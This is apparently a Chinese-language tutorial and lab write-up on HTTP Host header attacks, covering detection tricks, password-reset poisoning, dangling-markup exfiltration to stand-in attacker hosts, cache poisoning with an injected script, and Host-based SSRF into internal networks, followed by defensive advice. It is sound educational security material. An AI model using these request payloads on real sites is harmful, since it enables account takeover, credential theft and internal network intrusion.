1. HTTP Host頭攻擊

從HTTP / 1.1開(kāi)始，HTTP Host標(biāo)頭是必需的請(qǐng)求標(biāo)頭。它指定客戶(hù)端要訪(fǎng)問(wèn)的域名。例如，當(dāng)用戶(hù)訪(fǎng)問(wèn)
https://example.net/web-security時(shí)，其瀏覽器將組成一個(gè)包含Host標(biāo)頭的請(qǐng)求，如下所示：

GET /web-security HTTP/1.1
Host: example.net

在某些情況下，例如當(dāng)請(qǐng)求由代理轉(zhuǎn)發(fā)時(shí)，Host值可能會(huì)在到達(dá)預(yù)期的后端組件之前進(jìn)行更改。也就發(fā)生了Host頭攻擊。

 

2. HTTP Host頭的作用

HTTP Host頭的目的是幫助識(shí)別客戶(hù)端要與之通信的后端組件。如果請(qǐng)求不包含Host頭或者格式不正確，則在將傳入請(qǐng)求的應(yīng)用程序時(shí)可能會(huì)導(dǎo)致問(wèn)題。

從歷史上看，這種漏洞并不存在太大問(wèn)題，因?yàn)槊總€(gè)IP地址只會(huì)被用于單個(gè)域的內(nèi)容。如今，很大程度上是由于同一個(gè)IP上存在多個(gè)Web應(yīng)用程序（不同端口，不同域名解析等），通常可以在同一IP地址訪(fǎng)問(wèn)多個(gè)網(wǎng)站和應(yīng)用程序。這種方法的普及也部分是由于IPv4地址耗盡所致。

當(dāng)可以通過(guò)同一IP地址訪(fǎng)問(wèn)多個(gè)應(yīng)用程序時(shí)，最常見(jiàn)的原因是以下情況之一：

• 虛擬主機(jī)

單個(gè)Web服務(wù)器托管多個(gè)網(wǎng)站或應(yīng)用程序。這可能是具有單個(gè)所有者的多個(gè)網(wǎng)站，但是也可能是不同所有者的網(wǎng)站托管在同一個(gè)共享平臺(tái)上。它們都與服務(wù)器共享一個(gè)公共IP地址。

• 通過(guò)代理路由流量

網(wǎng)站托管在不同的后端服務(wù)器上，但是客戶(hù)端和服務(wù)器之間的所有流量都通過(guò)代理系統(tǒng)進(jìn)行路由。這可能是一個(gè)簡(jiǎn)單的負(fù)載平衡設(shè)備或某種反向代理服務(wù)器。在客戶(hù)通過(guò)內(nèi)容分發(fā)網(wǎng)絡(luò)（CDN）訪(fǎng)問(wèn)網(wǎng)站的情況下，這種設(shè)置尤其普遍。

在上面兩種種情況下，即使網(wǎng)站托管在單獨(dú)的后端服務(wù)器上，它們的所有域名也都解析為中間組件的單個(gè)IP地址。這帶來(lái)了與虛擬主機(jī)相同的問(wèn)題，因?yàn)榉聪虼砘蜇?fù)載平衡需要知道每個(gè)請(qǐng)求到的哪個(gè)后端上。

HTTP Host頭的作用就在于，指定請(qǐng)求應(yīng)該發(fā)送到那個(gè)應(yīng)用程序的后端服務(wù)器上。打個(gè)比方，一封信需要送到居住在公寓樓中的某人手中，整個(gè)公寓有許多房間，每個(gè)房間都可以接受信件，通過(guò)指定房間號(hào)和收件人（也就是HTTP Host頭）來(lái)將信封送到指定的人手中。

 

3. 什么是HTTP Host頭攻擊

一些網(wǎng)站以不安全的方式處理Host頭的值。如果服務(wù)器直接信任Host頭，未校驗(yàn)它的合法性，則攻擊者可能能夠使用此可控變量來(lái)注入Host，以操縱服務(wù)器端的行為。

現(xiàn)成的Web應(yīng)用程序通常不知道將它們部署在哪個(gè)域上，除非在安裝過(guò)程中在配置文件中手動(dòng)指定了該域。例如，當(dāng)他們需要知道當(dāng)前域以生成電子郵件中包含的絕對(duì)URL時(shí)，他們可能依賴(lài)于Host頭中的值：

<a href="https://_SERVER['HOST']/support">聯(lián)系支持</a>

Host頭值還可以用于不同網(wǎng)站系統(tǒng)之間的各種交互。

由于Host頭實(shí)際上是用戶(hù)可控制的，因此這種做法可能導(dǎo)致許多問(wèn)題。如果未校驗(yàn)或者直接使用Host頭，則Host頭可以與一系列其他漏洞“組合拳”攻擊，比如：

• 緩存投毒
• 特殊業(yè)務(wù)功能的邏輯漏洞
• 基于路由的SSRF
• 經(jīng)典服務(wù)端漏洞，如SQL注入（當(dāng)Host被用于SQL語(yǔ)句時(shí)）等

4. 如何發(fā)掘HTTP Host頭攻擊

首先要判斷服務(wù)端是否檢測(cè)Host頭？檢測(cè)完了是否還使用Host頭的值？

通過(guò)修改Host的值，如果服務(wù)端返回錯(cuò)誤信息：

 

則說(shuō)明服務(wù)端檢測(cè)了Host的內(nèi)容。至于有沒(méi)有使用Host頭的值，有以下幾種方法去發(fā)掘：

修改Host值

簡(jiǎn)單的來(lái)說(shuō)，可以修改HTTP頭中的Host值，如果觀(guān)察到響應(yīng)包中含有修改后的值，說(shuō)明存在漏洞。

但有時(shí)候篡改Host頭的值會(huì)導(dǎo)致無(wú)法訪(fǎng)問(wèn)Web應(yīng)用程序，從而導(dǎo)致“無(wú)效主機(jī)頭”的錯(cuò)誤信息，特別是通過(guò)CDN訪(fǎng)問(wèn)目標(biāo)時(shí)會(huì)發(fā)生這種情況。

添加重復(fù)的Host頭

添加重復(fù)的Host頭，通常兩個(gè)Host頭之中有一個(gè)是有效的，可以理解為一個(gè)是確保請(qǐng)求正確地發(fā)送到目標(biāo)服務(wù)器上；另一個(gè)則是傳遞payload到后端服務(wù)器中。

GET /example HTTP/1.1
Host: vulnerable-website.com
Host: attackd-stuff

使用絕對(duì)路徑的URL

盡管許多請(qǐng)求通常在請(qǐng)求域上使用相對(duì)路徑，但是也同時(shí)配置了絕對(duì)URL的請(qǐng)求。

GET https://vulnerable-website.com/ HTTP/1.1
Host: attack-stuff

有時(shí)候也可以嘗試不同的協(xié)議，如HTTP或HTTPS。

添加縮進(jìn)或換行

當(dāng)一些站點(diǎn)block帶有多個(gè)Host頭的請(qǐng)求時(shí)，可以通過(guò)添加縮進(jìn)字符的HTTP頭來(lái)繞過(guò)：

GET /example HTTP/1.1
 Host: attack-stuff
Host: vulnerable-website.com

注入覆蓋Host頭的字段

與Host頭功能相近的字段，如X-Forwarded-Host、X-Forwarded-For等，這些有時(shí)候是默認(rèn)開(kāi)啟的。

GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: attack-stuff

諸如此類(lèi)，還有其他的字段：

• X-Host
• X-Forwarded-Server
• X-HTTP-Host-Override
• Forwarded

忽略端口僅校驗(yàn)域名

當(dāng)修改、添加重復(fù)Host頭被攔截的時(shí)候，可以嘗試了解Web應(yīng)用程序是怎樣解析Host頭的。

比如，一些解析算法會(huì)忽略Host頭中的端口值，僅僅校驗(yàn)域名。這時(shí)候可以將Host修改為如下形式：

GET /example HTTP/1.1
Host: vulnerable-website.com:attack-stuff

保持域名不變，修改端口值為非端口號(hào)的其他值（非數(shù)字）， 將Host頭攻擊的payload放在端口值處，同樣能進(jìn)行Host頭攻擊。

 

5. HTTP Host頭攻擊漏洞示例

5.1 密碼重置中毒

根據(jù)HTTP Host頭攻擊的攻擊特點(diǎn)，它被廣泛應(yīng)用于密碼重置中毒：攻擊者可以操縱網(wǎng)站在重置密碼情況下生成的密碼重置鏈接，使其發(fā)送攻擊者指定的域下，利用此來(lái)竊取重置任意用戶(hù)密碼的令牌。

 

一個(gè)重設(shè)密碼（忘記密碼）功能的大致流程如下：

用戶(hù)輸入其用戶(hù)名或電子郵件地址，然后提交密碼重置請(qǐng)求。

該網(wǎng)站檢查該用戶(hù)是否存在，然后生成一個(gè)臨時(shí)的、唯一的、復(fù)雜的令牌，該令牌與后端的用戶(hù)帳戶(hù)相關(guān)聯(lián)。

該網(wǎng)站向用戶(hù)發(fā)送一封電子郵件，其中包含用于重置其密碼的鏈接。重置令牌的參數(shù)包含在相應(yīng)的URL中：

https://normal-website.com/reset?token=0a1b2c3d4e5f6g7h8i9j

4. 當(dāng)用戶(hù)訪(fǎng)問(wèn)此URL時(shí)，網(wǎng)站將檢查提供的令牌是否有效，并使用它來(lái)確定要重置哪個(gè)帳戶(hù)。如果一切都符合，則可以進(jìn)入用戶(hù)重置密碼步驟。最后，令牌被銷(xiāo)毀。

以上步驟的安全性依賴(lài)于：只有目標(biāo)用戶(hù)才能訪(fǎng)問(wèn)其電子郵件，從而可以訪(fǎng)問(wèn)其唯一的令牌。

密碼重置中毒是竊取此令牌以更改另一個(gè)用戶(hù)密碼的一種漏洞。

如果網(wǎng)站重置密碼的流程完全依賴(lài)用戶(hù)的可控輸入（如HTTP Host頭），這可能導(dǎo)致密碼重置中毒：

1. 攻擊者獲取受害者的用戶(hù)名或者電子郵件，作為提交重置密碼的請(qǐng)求，攻擊者會(huì)攔截請(qǐng)求并修改HTTP Host頭為其指定的域，如evil-user.net

2. 受害者會(huì)收到一封重置密碼的郵件，但由于攻擊者修改了Host頭，而web程序生成重置鏈接又完全依賴(lài)于Host頭，導(dǎo)致生成以下URL：

https://evil-user.net/reset?token=0a1b2c3d4e5f6g7h8i9j

3. 如果受害者點(diǎn)擊了該鏈接，重置密碼的令牌就會(huì)發(fā)送到攻擊者的服務(wù)器 evil-user.net 上

4. 當(dāng)攻擊者獲取到蟲(chóng)子密碼的令牌之后，就會(huì)進(jìn)行相應(yīng)的構(gòu)造訪(fǎng)問(wèn)真實(shí)重置密碼的URL進(jìn)行密碼重置。

5.1.1 密碼重置中毒—基礎(chǔ)

詳細(xì)了解了上面的密碼重置中毒的流程和原理之后，這里通過(guò)HTTP Host頭攻擊導(dǎo)致的基礎(chǔ)的密碼重置中毒來(lái)演示。

首先輸入用戶(hù)名或者用戶(hù)的電子郵箱來(lái)重置指定用戶(hù)的密碼：

 

提交之后，會(huì)發(fā)送一封重置密碼的電子郵件到wiener用戶(hù)的郵箱中（數(shù)據(jù)包如右圖）：

 

注意重置密碼的鏈接，可能是受Host頭的值的影響？

我們來(lái)驗(yàn)證一下是否存在HTTP Host頭攻擊，修改Host頭的值為 baidu.com：

 

發(fā)現(xiàn)請(qǐng)求是可以被后端服務(wù)器接收的，所以是存在HTTP Host頭攻擊的。

這里就輸入受害用戶(hù)carlos進(jìn)行重置密碼，然后抓包將Host頭的值改為我們自己的服務(wù)器：

 

然后在我們自己的服務(wù)器上就可以通過(guò)訪(fǎng)問(wèn)日志看到被竊取的重置密碼Token：

 

然后根據(jù)已知鏈接規(guī)律，構(gòu)造重置密碼的鏈接：

https://ac651f551e5317b8800207bd008f000f.web-security-academy.net/forgot-password?temp-forgot-password-token=00YIexUDyNLEJkaBXDoCILWtZAGaxgi7

 

隨即進(jìn)入輸入新密碼的界面，密碼重置中毒成功。

5.1.2 密碼重置中毒—注入覆蓋Host頭的字段

有時(shí)候直接修改Host頭、添加重復(fù)Host頭的值以及混淆Host頭都不行：

 

可以嘗試使用與Host頭功能相同的HTTP字段，如X-Forwarded-Host、X-Forwarded-For等，可以進(jìn)行Fuzz：

 

實(shí)際上他能夠被 X-Forwarded-Host 字段影響，導(dǎo)致Host頭攻擊，當(dāng)同時(shí)添加多個(gè)字段使請(qǐng)求被攔截時(shí)，可以嘗試類(lèi)似排除法、二分法來(lái)排查哪個(gè)字段有效。

對(duì)受害用戶(hù)carlos進(jìn)行密碼重置投毒：

 

然后構(gòu)造鏈接即可：

https://acf11f4e1f164378800b165b00bb007d.web-security-academy.net/forgot-password?temp-forgot-password-token=o8gD3Le1K0YQcb2AaASgiI8F2eVI5m3h

 

5.1.3 重置密碼中毒—Dangling Markup技術(shù)

首先簡(jiǎn)單介紹一下 Dangling Markup技術(shù)：

Dangling markup技術(shù)

Dangling markup技術(shù), 是一種無(wú)需腳本即可竊取頁(yè)面內(nèi)容的技術(shù)，它使用圖像等資源(結(jié)合CSP運(yùn)行的策略)將數(shù)據(jù)發(fā)送到攻擊者控制的遠(yuǎn)程位置。當(dāng)反射型XSS不工作或被內(nèi)容安全策略（CSP）阻止時(shí)，它非常有用。其思想是插入一些未完成狀態(tài)的部分html，例如圖像標(biāo)記的src屬性，頁(yè)面上的其余標(biāo)記關(guān)閉該屬性，但同時(shí)將兩者之間的數(shù)據(jù)(包含竊取頁(yè)面的內(nèi)容)發(fā)送到遠(yuǎn)程服務(wù)器。

例如，我們?cè)诜瓷湫蚗SS注入點(diǎn)上注入這樣一個(gè)img標(biāo)簽：

<img src="https://evilserver/?

則注入點(diǎn)和下一個(gè)雙引號(hào)的代碼將會(huì)發(fā)送到攻擊者的 https://evilserver 服務(wù)器, 其中被發(fā)送的代碼或者內(nèi)容可能包含一些敏感信息, 例如CSRF Token等, 配合反射型XSS以完成CSRF的利用。

關(guān)于 Dangling Markup技術(shù) 的實(shí)戰(zhàn)意義可以參考博主之前的文章：繞過(guò)CSP之Dangling markup技術(shù)

什么時(shí)候可以使用 Dangling Markup技術(shù) 呢？與我們這篇文章的主題有什么關(guān)系呢？

我們直接進(jìn)入主題，當(dāng)輸入需要重置密碼的用戶(hù)名后，該用戶(hù)的郵箱內(nèi)會(huì)收到如下郵箱：

 

有一個(gè)跳轉(zhuǎn)到登錄界面的鏈接，后面緊接著重置之后的隨機(jī)密碼。

此時(shí)考慮一下，該鏈接是否是從Host頭取值而來(lái)？只要這個(gè)值可控，那么就可以利用Host頭攻擊實(shí)施 Dangling Markup攻擊，包含住鏈接后面緊跟著的密碼，再結(jié)合Host頭攻擊將請(qǐng)求指定到攻擊者服務(wù)器上。一個(gè)漫天過(guò)海的竊取行為就完成了。

• 第一步，尋找Host頭攻擊點(diǎn)：

通過(guò)Fuzz，可發(fā)現(xiàn)Host頭攻擊類(lèi)型為 忽略端口僅校驗(yàn)域名。即服務(wù)端在校驗(yàn)Host域的時(shí)候，僅校驗(yàn)了域名，忽略了后面的端口號(hào)，造成端口值可控（可以是數(shù)字或字符）：

 

 

通過(guò)在Host頭的端口中注入payload，依舊可以實(shí)現(xiàn)Host頭攻擊。

• 第二步，借助可控變量 Host：ip:port 來(lái)實(shí)施 Dangling Markup技術(shù)，從而將后面的密碼外帶到攻擊者服務(wù)器上：

注意，需要閉合此處的雙引號(hào)出去，經(jīng)過(guò)嘗試，輸入單引號(hào)時(shí)，服務(wù)端會(huì)自動(dòng)轉(zhuǎn)為雙引號(hào)，故這里通過(guò)單引號(hào)將雙引號(hào)閉合，然后添加自定的<a href=xxx.attack-domain>標(biāo)簽將密碼外帶：

 

原本的正常HTML是這樣的：

 

通過(guò)Dangling Markup技術(shù) 在a標(biāo)簽的鏈接中注入? 符，使得后面的值在雙引號(hào)閉合之前全部被當(dāng)做URL參數(shù)請(qǐng)求到攻擊者服務(wù)器上：

 

這也是 Dangling Markup技術(shù) 的精髓所在，該技術(shù)的核心點(diǎn)在于：

可控變量后面是否接著需要竊取的關(guān)鍵數(shù)據(jù)（包括Token、密碼等）

在攻擊者服務(wù)器上可以看到被Host頭攻擊轉(zhuǎn)發(fā)上來(lái)的請(qǐng)求，里面成功竊取了受害者重置后的密碼：

 

5.2 Host頭攻擊+緩存投毒

當(dāng)存在Host頭攻擊的web站點(diǎn)不存在密碼重置的功能的時(shí)候，此時(shí)該漏洞就顯得沒(méi)有影響，因?yàn)椴豢赡茯?qū)使用戶(hù)去抓包修改Host頭，輔助攻擊者完成一系列的攻擊。

但是，如果目標(biāo)站點(diǎn)使用Web緩存，則可以通過(guò)緩存投毒給其他用戶(hù)提供帶有病毒的緩存響應(yīng)。此時(shí)的Host頭攻擊漏洞轉(zhuǎn)變?yōu)轭?lèi)似XSS存儲(chǔ)型類(lèi)的漏洞。要構(gòu)造Web緩存投毒攻擊：

1. 需要尋找映射到其他用戶(hù)請(qǐng)求的緩存鍵；

2. 下一步則是緩存此惡意響應(yīng)；

3. 然后，此惡意緩存將提供給嘗試訪(fǎng)問(wèn)受影響頁(yè)面的所有用戶(hù)。

 

• 第一步，尋找Host頭攻擊點(diǎn)：

通過(guò)對(duì)站點(diǎn)的主頁(yè)添加重復(fù)的Host值，可以達(dá)到覆蓋的效果，并驗(yàn)證存在Host頭攻擊：

 

• 第二步，尋找是否使用了Web緩存？緩存鍵是什么？

從上圖中也可以發(fā)現(xiàn)，站點(diǎn)使用了Wen緩存功能，并且配合Host頭攻擊，可以緩存/resources/js/tracking.js資源文件。

• 第三步，在攻擊者服務(wù)器上創(chuàng)建一個(gè)同名的 /resources/js/tracking.js資源文件，內(nèi)容為：

alert(document.cookie);

然后通過(guò)Host頭注入攻擊者服務(wù)器域名，可以看到在響應(yīng)中正確地對(duì)應(yīng)了我們的 /resources/js/tracking.js資源文件：

 

發(fā)送多次請(qǐng)求，使該請(qǐng)求的響應(yīng)變?yōu)榫彺妫?/p>

 

當(dāng)其他用戶(hù)請(qǐng)求站點(diǎn)主頁(yè)時(shí)，服務(wù)端就會(huì)提供該惡意緩存給用戶(hù)，造成緩存投毒。

5.3 Host頭攻擊繞過(guò)訪(fǎng)問(wèn)控制

出于安全考慮，通常網(wǎng)站對(duì)某些功能的訪(fǎng)問(wèn)限制為內(nèi)部用戶(hù)使用。但是通過(guò)Host頭攻擊一定可能上可以繞過(guò)這些限制。

對(duì)于一個(gè)站點(diǎn)，從發(fā)現(xiàn)Host頭攻擊到利用，下面來(lái)展示一個(gè)完整的流程：

• 第一步，訪(fǎng)問(wèn)主頁(yè)，隨意修改Host的值：

 

注意，這里的Host的值不會(huì)出現(xiàn)響應(yīng)包中，但是依然可能存在Host頭攻擊，因?yàn)轫憫?yīng)依然成功，說(shuō)明服務(wù)端沒(méi)有對(duì)Host頭做驗(yàn)證。

• 第二步，尋找敏感頁(yè)面，通過(guò) /robots.txt 知道 /admin 為做了訪(fǎng)問(wèn)控制的頁(yè)面：

 

可以錯(cuò)誤信息提示，/admin 頁(yè)面只允許本地用戶(hù)訪(fǎng)問(wèn)。

• 第三步，將Host改為服務(wù)端內(nèi)部地址，從而繞過(guò)IP訪(fǎng)問(wèn)控制：

 

5.4 Host頭攻擊+SSRF

Host頭攻擊可能會(huì)導(dǎo)致基于路由的SSRF攻擊，稱(chēng)為：Host SSRF Attack。

經(jīng)典的SSRF攻擊通常基于XXE或可利用的業(yè)務(wù)邏輯，將用戶(hù)可控的URL作為HTTP請(qǐng)求發(fā)送；而基于路由的SSRF依賴(lài)于云部署的體系結(jié)構(gòu)中，包括負(fù)載均衡和反向代理，這些中間件將請(qǐng)求分配發(fā)送到對(duì)應(yīng)的后端服務(wù)器處理，如果服務(wù)端未校驗(yàn)Host頭轉(zhuǎn)發(fā)的請(qǐng)求，則攻擊者可能會(huì)將請(qǐng)求發(fā)送（重定向）到體系中的任意系統(tǒng)。

這可能需要知道內(nèi)部系統(tǒng)的IP地址（私有地址），一般可以通過(guò)信息收集或者Fuzz來(lái)判斷有效的私有IP地址（如枚舉192.168.1.1/16）。

5.4.1 基礎(chǔ)Host頭攻擊+SSRF

比如，普通方式訪(fǎng)問(wèn)不到 /admin 頁(yè)面（404）：

 

猜測(cè) /admin 存在于內(nèi)網(wǎng)中，需要內(nèi)網(wǎng)機(jī)器才能訪(fǎng)問(wèn)，但是配合Host頭攻擊+SSRF可以繞過(guò)并訪(fǎng)問(wèn)。

• 第一步，判斷Host是否被使用，可用DNSLog外帶

這里我使用Burp自帶的 “Burp Collaborator client” 來(lái)實(shí)現(xiàn)外帶：

 

說(shuō)明服務(wù)端是根據(jù)Host頭的域名來(lái)請(qǐng)求資源的。

• 第二步，基于Host頭的SSRF探測(cè)內(nèi)網(wǎng)主機(jī)

假如一些敏感的頁(yè)面（比如管理頁(yè)面），深處于內(nèi)網(wǎng)，外網(wǎng)無(wú)法訪(fǎng)問(wèn)，但是通過(guò)Host頭攻擊+SSRF可達(dá)到繞過(guò)訪(fǎng)問(wèn)控制，從而訪(fǎng)問(wèn)內(nèi)網(wǎng)資產(chǎn)，這里Fuzz內(nèi)網(wǎng)的IP的C段為192.168.0.0/24，直接利用Intruder枚舉：

 

 

得到內(nèi)網(wǎng)IP為192.168.0.240

• 第三步，訪(fǎng)問(wèn)內(nèi)網(wǎng)資源

構(gòu)造 /admin 頁(yè)面，在Host處換位內(nèi)網(wǎng)IP：

 

5.4.2 Host頭攻擊+SSRF—使用絕對(duì)路徑的URL

有時(shí)候服務(wù)端會(huì)校驗(yàn)Host頭的值，如果Host被修改，服務(wù)端會(huì)拒絕一切修改過(guò)后的請(qǐng)求：

 

普通請(qǐng)求通常在請(qǐng)求域上使用相對(duì)路徑，但是，服務(wù)端也同時(shí)可能配置了絕對(duì)URL的請(qǐng)求，采用如下形式可繞過(guò)對(duì)Host的驗(yàn)證：

GET http://acab1f4b1f3c7628805c2515009a00c9.web-security-academy.net/ HTTP/1.1

 

接著用 “Burp Collaborator client” 進(jìn)行外帶：

 

外帶成功，說(shuō)明Host頭被服務(wù)端使用來(lái)向指定域名請(qǐng)求資源，直接SSRF爆破內(nèi)網(wǎng)：

 

訪(fǎng)問(wèn)內(nèi)網(wǎng)頁(yè)面：

 

6 HTTP Host頭攻擊防護(hù)

最簡(jiǎn)單的方法是避免在服務(wù)器端代碼中完全使用Host頭，可以只使用相對(duì)URL。

其他方法包括：

6.1 正確配置絕對(duì)域名URL

當(dāng)必須使用絕對(duì)域名URL時(shí)，應(yīng)在配置文件中手動(dòng)指定當(dāng)前域的URL，并引用配置的值，而不是從HTTP的Host頭中獲取。這種方法可防止密碼重置的緩存投毒。

6.2 白名單校驗(yàn)Host頭的域

如果必須使用Host頭，需要正確校驗(yàn)它的合法性。這包括允許的域，并使用白名單校驗(yàn)它，以及拒絕或重定向?qū)o(wú)法識(shí)別的主機(jī)請(qǐng)求。這包括但不僅限于單個(gè)web應(yīng)用程序、負(fù)載均衡以及反向代理設(shè)備上。

6.3 不支持主機(jī)頭覆蓋

確保不適用與Host頭功能相近的字段，如X-Forwarded-Host、X-Forwarded-For等，這些有時(shí)候是默認(rèn)開(kāi)啟的。

值得一提的是，不應(yīng)該將內(nèi)網(wǎng)使用的Host主機(jī)（不出網(wǎng)）與公網(wǎng)的應(yīng)用程序托管在同一個(gè)服務(wù)器上，否則攻擊者可能會(huì)操縱Host頭來(lái)訪(fǎng)問(wèn)內(nèi)部域。